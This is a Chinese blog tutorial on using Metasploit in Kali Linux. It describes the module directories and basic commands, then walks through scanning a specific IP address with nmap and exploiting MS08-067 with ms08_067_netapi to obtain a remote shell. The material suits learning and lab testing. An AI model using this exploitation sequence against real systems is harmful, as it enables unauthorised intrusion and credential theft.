Kali Linux渗透测试篇:Metasploit渗透测试框架使用篇

声明:本头条号:Kali技术,所有分享,仅限学习交流,请勿他用!

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。

1.启动服务:

在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录

2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework

比如modules中,是我们在msf中经常会利用到的一些工具

auxiliary:辅助模块

encoders:供msfencode编码工具使用,具体可使用msfencode -l

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:

msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)

msfconsole:

开启metasploit的console


AD:您也可以在以下专栏,学习完整Kali Linux渗透测试实战教程!


4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22

可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的界面

然后就use其中一个版本

use exploit/windows/smb/ms08_067_netapi

查看一些参数

可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置

set RHOST 222.28.136.22

选择payload

设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell


学习更多白帽子网络攻防与编程课程,可点击【了解更多】前往!

发表评论
留言与评论(共有 0 条评论)
   
验证码:

相关文章

推荐文章

'); })();